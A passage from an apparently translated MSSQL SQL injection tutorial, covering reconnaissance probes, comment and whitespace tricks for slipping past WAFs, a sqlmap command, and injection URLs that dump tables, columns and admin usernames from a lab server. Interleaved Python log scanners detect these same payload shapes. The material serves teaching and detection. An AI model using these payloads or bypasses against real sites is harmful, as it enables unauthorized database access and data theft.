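def analyze_log_line(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for a log line whose query string probes role membership, else None."""
    match = REQUEST_LINE.search(line)
    if not match:
        return None
    query = unquote(urlsplit(match.group(1)).query)
    probes = find_role_probes(query)
    if not probes:
        return None
    return {
        "client": line.split(" ", 1)[0],
        "decoded": decode_char_concat(query),
        "probes": probes,
    }


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run analyze_log_line over a batch of log lines and keep only the findings."""
    return [hit for hit in (analyze_log_line(ln) for ln in lines) if hit is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit["client"], hit["probes"])
        print("    ", hit["decoded"])
```

Running the script prints two findings for client 10.0.0.9: the decoded first request reads `... 'qzqkq'+(SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END))+'qvpxq' ...`, which is exactly the sqlmap probe with its markers made visible, and the second is the plain serveradmin check. Decoding before matching is the point: a rule that looks for the literal string 'sysadmin' in requests never fires on the CHAR() form.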

Database-level roles

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> IS_MEMBER</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'db_owner'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
   </ol>

0x01 Basic information

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>@@version -- database version</code></p></li>
    <li><p><code>user -- name of the current database user</code></p></li>
    <li><p><code>db_name() -- current database name; db_name(N) can be used to enumerate the other databases</code></p></li>
    <li><p><code>;select user -- tests whether stacked queries (multiple statements) are supported</code></p></li>
   </ol>

0x02 Determining whether the web server and the database server are separate hosts

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>select * from info where id='1' and host_name()=@@servername;--'</code></p></li>
   </ol>

This is the simplest method: the query compares host_name(), the workstation name of the client that opened the connection, with @@servername, so if the two match the web application and the database are running on the same host. If you can call xp_cmdshell, you can of course also determine it from cmd.

Having established the database version and the current user's privileges, we can plan the next step. For example, with xp_cmdshell you need to know that on 2005 it generally runs as SYSTEM, whereas on 2008 it runs as NT AUTHORITY\NETWORK SERVICE.

Chapter 3: MSSQL symbols

0x00 Comment symbols

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>/*</code></p></li>
    <li><p><code>--</code></p></li>
    <li><p><code>;%00</code></p></li>
   </ol>

0x01 Whitespace characters

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20 -- hex byte values the parser accepts in place of a space</code></p></li>
    <li><p><code>/**/</code></p></li>
   </ol>
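The reconnaissance probes under 0x01 and 0x02 above (@@version, select user, IS_MEMBER, host_name()=@@servername, stacked ;select) are exactly what a defender wants to spot in SQL Server audit or Extended Events output, and the comment and whitespace substitutes in this chapter are why a naive string match misses them: a probe separated by 0x0B or /**/ does not contain a space. The Python below is an added example, not code from the article or its author. It canonicalizes logged statement text by resolving comments and folding every byte from 0x01 to 0x20 to one space, then matches the probes; the probe names, the set of "odd" control bytes (everything below 0x20 other than tab, LF and CR) and the log lines are constructed for this example.

```python
import re
from typing import Dict, List

# Per the list above, the MSSQL parser accepts every byte from 0x01 to 0x20 as
# whitespace, so all of them are folded to one space before matching.
_WS_RE = re.compile(r"[\x01-\x20]+")
# Control bytes that SQL emitted by a well-behaved application never contains
# (tab, LF, CR and space are left out because they are normal in query text).
_ODD_CTRL_RE = re.compile(r"[\x01-\x08\x0b\x0c\x0e-\x1f]")
_BLOCK_COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)
_LINE_COMMENT_RE = re.compile(r"--[^\r\n]*")
_PUNCT_WS_RE = re.compile(r" ?([=(),;]) ?")

# Probe names are this example's own labels, not SQL Server terminology.
PROBES: Dict[str, re.Pattern] = {
    "version_probe": re.compile(r"@@version"),
    "current_user_probe": re.compile(r"\bselect user\b"),
    "role_probe": re.compile(r"\bis_(?:srvrole)?member\("),
    "db_enum_probe": re.compile(r"\bdb_name\(\d+\)"),
    "colocation_probe": re.compile(r"host_name\(\)=@@servername"),
    "stacked_query": re.compile(r";(?:select|exec|declare|insert|update|delete|drop)\b"),
}


def canonicalize(sql: str) -> str:
    """Remove comments, fold every whitespace byte to one space, lower-case.

    Comments are resolved first because '/**/' doubles as a whitespace
    substitute and '--' runs to the end of the line, so both need the
    original line structure to still be intact.
    """
    s = sql.replace("\x00", " ")        # ';%00' arrives as ';' + NUL after URL decoding
    s = _BLOCK_COMMENT_RE.sub(" ", s)
    s = _LINE_COMMENT_RE.sub(" ", s)
    s = _WS_RE.sub(" ", s)
    s = _PUNCT_WS_RE.sub(r"\1", s)      # 'host_name ( ) = @@servername' -> 'host_name()=@@servername'
    return s.strip().lower()


def scan(sql: str) -> List[str]:
    """Return the sorted probe names matched by one logged statement."""
    canon = canonicalize(sql)
    hits = [name for name, rx in PROBES.items() if rx.search(canon)]
    if _ODD_CTRL_RE.search(sql):
        hits.append("odd_control_bytes")  # raw control bytes are a signal on their own
    return sorted(hits)


def scan_log(lines: List[str]) -> Dict[int, List[str]]:
    """Map the index of every suspicious statement to the probes it triggered."""
    findings: Dict[int, List[str]] = {}
    for idx, line in enumerate(lines):
        hits = scan(line)
        if hits:
            findings[idx] = hits
    return findings


# Constructed statement texts, standing in for the statement column of a
# SQL Server audit or Extended Events capture. Lines 1 and 4 hide the probe
# behind the 0x0B and 0x1F separators listed above; line 0 is benign.
SAMPLE_LOG = [
    "SELECT name, price FROM products WHERE id = 42",
    "SELECT\x0b@@version/**/--",
    "SELECT\tIS_MEMBER('db_owner')",
    "select * from info where id='1' and host_name()=@@servername;--'",
    "select * from info where id='1';\x1fselect\x1fuser--",
    "select/**/db_name(3)",
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(hits)}  <- {canonicalize(SAMPLE_LOG[idx])!r}")
```

Running the script flags lines 1 to 5 and leaves the benign query alone. The control-byte check is kept separate from the probe patterns on purpose: even when none of the probes match, a statement from a web application that contains 0x0B or 0x1F between tokens is worth an alert by itself, and the canonical form printed beside each hit is what an analyst compares against the application's own query templates.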

0x02 Operators

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>+ addition</code></p></li>
    <li><p><code>- subtraction</code></p></li>
    <li><p><code>* multiplication</code></p></li>
    <li><p><code>/ division; if both operands are integers the result is an integer and the fractional part is discarded</code></p></li>
    <li><p><code>% modulo; returns the remainder of dividing the two numbers</code></p></li>
    <li><p><code>&amp; bitwise AND; takes the corresponding bits of the two expressions, and the result bit is 1 only when both input bits are 1, otherwise 0</code></p></li>
    <li><p><code>| bitwise OR; takes the corresponding bits of the two expressions, and the result bit is 1 when either input bit is 1, and 0 only when both are 0</code></p></li>
    <li><p><code>^ bitwise XOR; takes the corresponding bits of the two expressions, and the result bit is 1 when exactly one input bit is 1, and 0 when both are 0 or both are 1</code></p></li>
    <li><p><code>= equal to</code></p></li>
    <li><p><code>&lt;&gt; not equal to</code></p></li>
    <li><p><code>&gt; greater than</code></p></li>
    <li><p><code>!= not equal to</code></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"><</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">小于</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">!<</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不小于</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">>=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">大于或等于</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">!></span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不大于</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"><=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">小于或等于</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">ALL </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果一组的比较都为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,则比较结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">AND </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果两个布尔表达式都为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,则结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;如果其中一个表达式为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">false</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,则结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">false</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">ANY </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果一组的比较中任何一个为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,则结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">BETWEEN </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果操作数在某个范围之内,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXISTS </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果子查询中包含了一些行,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">IN </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果操作数等于表达式列表中的一个,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">LIKE </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果操作数与某种模式相匹配,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">NOT </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">对任何其他布尔运算符的结果值取反</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">OR </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果两个布尔表达式中的任何一个为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">SOME </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果在一组比较中,有些比较为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
   </ol>

0x03 Syntax notation symbols

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>&lt; &gt;  Angle brackets delimit a string that names a syntax element, a non-terminal of the SQL language.</code></p></li>
    <li><p><br></p></li>
    <li><p><code>::=  Definition operator. In a production rule it separates the element being defined from its definition: the defined element is on the left, the definition on the right.</code></p></li>
    <li><p><br></p></li>
    <li><p><code>[ ]  Square brackets mark optional elements of a rule. The bracketed part may be given explicitly or omitted.</code></p></li>
    <li><p><br></p></li>
    <li><p><code>{ }  Braces group elements of a rule. The part inside braces must be given explicitly.</code></p></li>
    <li><p><br></p></li>
    <li><p><code>()  Parentheses are the grouping operator.</code></p></li>
   </ol>

As with MySQL, knowing these symbol and syntax features of the database well helps us bypass WAFs.

Chapter 4: Basic MSSQL injection workflow

0x00 The first injection

I recommend setting up a local instance and running sqlmap against it to see the injection statements it uses:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>sqlmap -u "http://192.168.130.137/1.aspx?id=1" --is-dba -v3</code></p></li>
   </ol>

Determine the current database

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1'and db_name()&gt;0;--</code></p></li>
   </ol>

Dump table names

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1' and 1=(select top 1 name from sysobjects where xtype='u' and name !='info');--</code></p></li>
   </ol>

Dump column names

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1' and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'admin') and name&lt;&gt;'id');--</code></p></li>
   </ol>

Dump data

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1' and 1=(select top 1 username from admin);--</code></p></li>
   </ol>

Because MSSQL has no LIMIT, the only way to walk through the rows is TOP combined with the exclusion conditions that follow it (name !='...', name&lt;&gt;'...'), excluding each value already retrieved.
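From the defender's side, the payload shapes in this chapter (sysobjects/syscolumns lookups, db_name(), "and 1=(select top 1 ...)", the ";--" terminator) are easy to recognise in web server logs. The following Python is an added example, not code from the original article: it scans constructed IIS-style access-log lines for those shapes; the log field layout, the signature names and the client addresses are assumptions.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote_plus

# Signatures derived from the payload shapes shown in this chapter.
# Each entry: (name, regex applied to the normalised query string).
SIGNATURES = [
    # sysobjects / syscolumns / INFORMATION_SCHEMA lookups used to list tables and columns
    ("mssql-system-catalog",
     re.compile(r"\b(sysobjects|syscolumns|information_schema\.(tables|columns))\b")),
    # db_name() probe used to identify the current database
    ("db_name-probe", re.compile(r"\bdb_name\s*\(\s*\)")),
    # "and 1=(select top 1 ...)" comparison that forces a conversion error
    ("top1-subselect-compare",
     re.compile(r"\b(and|or)\s+\d+\s*=\s*\(\s*select\s+top\s+\d+\b")),
    # statement terminator followed by a line comment
    ("comment-terminator", re.compile(r";\s*--")),
]


@dataclass
class Finding:
    client_ip: str
    path: str
    query: str          # decoded, normalised form of the query string
    signatures: list    # names of the matching SIGNATURES entries


def normalise(query: str) -> str:
    """URL-decode twice (catches double encoding), collapse whitespace, lowercase."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).strip().lower()


def scan_query(query: str) -> list:
    """Return the names of all signatures that match a raw query string."""
    text = normalise(query)
    return [name for name, rx in SIGNATURES if rx.search(text)]


def parse_line(line: str):
    """Parse one constructed log line with the (assumed) field layout
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
    Returns (ip, path, query, status) or None; '-' means empty query as in IIS."""
    parts = line.split()
    if len(parts) != 7:
        return None
    _date, _time, ip, _method, path, query, status = parts
    return ip, path, ("" if query == "-" else query), int(status)


def scan_log(lines) -> list:
    """Run every signature over every parseable line; keep only lines with hits."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, query, _status = parsed
        hits = scan_query(query)
        if hits:
            findings.append(Finding(ip, path, normalise(query), hits))
    return findings


# Constructed sample log. The malicious query strings are the ones shown in this
# chapter; client addresses, timestamps and status codes are made up.
SAMPLE_LOG = [
    "2019-06-10 12:00:01 192.168.130.10 GET /1.aspx id=1 200",
    "2019-06-10 12:00:02 192.168.130.10 GET /1.aspx id=1'and+db_name()>0;-- 500",
    "2019-06-10 12:00:03 192.168.130.10 GET /1.aspx "
    "id=1%27+and+1=(select+top+1+name+from+sysobjects+where+xtype=%27u%27+and+name+!=%27info%27);-- 500",
    "2019-06-10 12:00:04 192.168.130.10 GET /1.aspx "
    "id=1+and+1=(select+top+1+table_name+from+information_schema.tables);-- 500",
    "2019-06-10 12:00:05 192.168.130.20 GET /list.aspx id=5&page=2 200",
    "2019-06-10 12:00:06 192.168.130.20 GET /search.aspx q=top+10+products 200",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.client_ip} {f.path} {f.signatures}")
```

The decoded query is kept in each Finding so an analyst can read the actual statement rather than the encoded log field.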

0x02 Other usages

Of course, to list all tables in the database you can also use INFORMATION_SCHEMA.TABLES:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> INFORMATION_SCHEMA</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">TABLES</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> INFORMATION_SCHEMA</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">COLUMNS </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> TABLE_NAME</span><span class="pun" style="box-sizing: border-box;line-height: 
20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'admin'</span></code></span></span></p></li>
    <li><p><br></p></li>
